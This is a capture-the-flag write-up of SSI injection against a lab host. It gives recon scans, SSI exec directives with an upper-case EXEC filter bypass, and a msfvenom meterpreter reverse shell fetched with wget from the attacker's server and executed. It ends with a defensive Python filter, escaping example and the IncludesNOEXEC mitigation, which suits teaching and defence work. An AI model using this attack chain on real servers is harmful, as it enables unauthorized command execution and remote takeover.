1. Introduction to SSI injection attacks
SSI (Server Side Includes) was introduced to add dynamic content to otherwise static HTML pages: the server evaluates directives embedded in the page as it is served, and the exec directive runs a system command and embeds its output in the response.
If files with .stm, .shtm or .shtml extensions appear in the web root (SSI processing is enabled for them) and the site does not strictly filter user input that ends up in SSI-parsed pages, it is likely vulnerable to SSI injection.
2. Information gathering
# Scan the host's services and service versions
nmap -sV 192.168.2.119
# Fast, aggressive scan of the host (OS and version detection, default scripts, traceroute)
nmap -T4 -A -v 192.168.2.119
# Probe the web server for sensitive files and misconfigurations
nikto -host http://192.168.2.119
3. Dig deeper
4. Vulnerability exploitation
Where the page accepts POST parameters, try submitting an SSI directive.
The server's response shows that exec is filtered, so try the upper-case form EXEC instead.
The directive now executes and the command output is returned.
# List the files and directories in the current directory
<!--#exec cmd="ls" -->
# Change to a given directory (each exec directive runs in its own shell, so a bare cd does not carry over to later directives; chain it with && in one command if needed)
<!--#exec cmd="cd /root/dir" -->
# Download the shell script (it is run with a further exec directive, see section 5)
<!--#exec cmd="wget http://192.168.2.110/shell.py" -->
5. Build the shell payload
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.2.110 LPORT=4444 -f raw > /root/Desktop/shell.py
# Start the listener
msf> use exploit/multi/handler
>set payload python/meterpreter/reverse_tcp
>set lhost 192.168.2.110
>set lport 4444
>run
# Start a web server on the attacking machine; the following directives download the shell from it
mv shell.py /var/www/html/
service apache2 start
# Download the shell script and run it (EXEC in upper case, since the lower-case exec is filtered)
<!--#EXEC cmd="wget http://192.168.2.110/shell.py" -->
<!--#EXEC cmd="chmod 777 shell.py" -->
<!--#EXEC cmd="python shell.py" -->
6. Post-exploitation
sysinfo    # show system information
shell      # drop into a system shell
# Upgrade to an interactive TTY
python -c "import pty;pty.spawn('/bin/bash')"
Privilege escalation is still required afterwards to reach the flag.
7. Summary
In CTF challenges, servers with SSI injection vulnerabilities often filter the payload, and the filter has to be bypassed, for example by changing the case of the directive name (EXEC instead of exec).
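The case bypass used in the exploitation step and the filtering point made in this summary can be shown in code. The following Python module is an added example written for this page, not code from the original writeup or from the target: it contrasts a naive case-sensitive blacklist of the kind the target appears to use (it blocks exec but lets EXEC through) with a check that matches any SSI directive regardless of case, and with output escaping, which removes the problem entirely because <!--# can no longer reach the SSI parser. The payload strings are constructed for the example; the whitespace/mixed-case variant and the exact form of the target's filter are assumptions, and the regex is deliberately broader than Apache's literal <!--# start sequence.

```python
import html
import re

# Constructed sample payloads, modelled on the directives used in this writeup.
PAYLOAD_LOWER = '<!--#exec cmd="ls" -->'
PAYLOAD_UPPER = '<!--#EXEC cmd="ls" -->'          # the case bypass from the writeup
PAYLOAD_SPACED = '<!-- #Exec cmd="id" -->'        # assumed variant: extra whitespace, mixed case
BENIGN = 'hello <!-- just a comment --> world'    # ordinary HTML comment, no directive


def naive_filter_blocks(value: str) -> bool:
    """Case-sensitive blacklist of the kind the target appears to use (assumption):
    it rejects the literal lower-case exec directive and nothing else."""
    return '<!--#exec' in value


def contains_ssi_directive(value: str) -> bool:
    """Detect any SSI directive start, whatever the case of the name and however
    much whitespace surrounds the '#'. Apache-style directives have the form
    <!--#name parameter="value" -->. Broader than Apache's own parser on purpose."""
    return re.search(r'<!--\s*#\s*[A-Za-z]+', value) is not None


def neutralize(value: str) -> str:
    """Escape the input so the server can no longer see '<!--#' as a directive
    start; the rendered page shows the user's text literally instead."""
    return html.escape(value, quote=True)


def demo() -> dict:
    """Summarise what each check does with each constructed payload."""
    return {
        "naive_blocks_lower": naive_filter_blocks(PAYLOAD_LOWER),
        "naive_blocks_upper": naive_filter_blocks(PAYLOAD_UPPER),   # False: bypassed
        "robust_flags_upper": contains_ssi_directive(PAYLOAD_UPPER),
        "robust_flags_spaced": contains_ssi_directive(PAYLOAD_SPACED),
        "robust_flags_benign": contains_ssi_directive(BENIGN),     # False: no false positive
        "escaped_is_inert": not contains_ssi_directive(neutralize(PAYLOAD_UPPER)),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Detection alone is still a blacklist; escaping user input before it lands in an SSI-parsed page is the fix that does not depend on guessing the attacker's spelling. On Apache, setting Options IncludesNOEXEC keeps SSI enabled but disables the exec directive, which takes command execution off the table even if a directive does get injected.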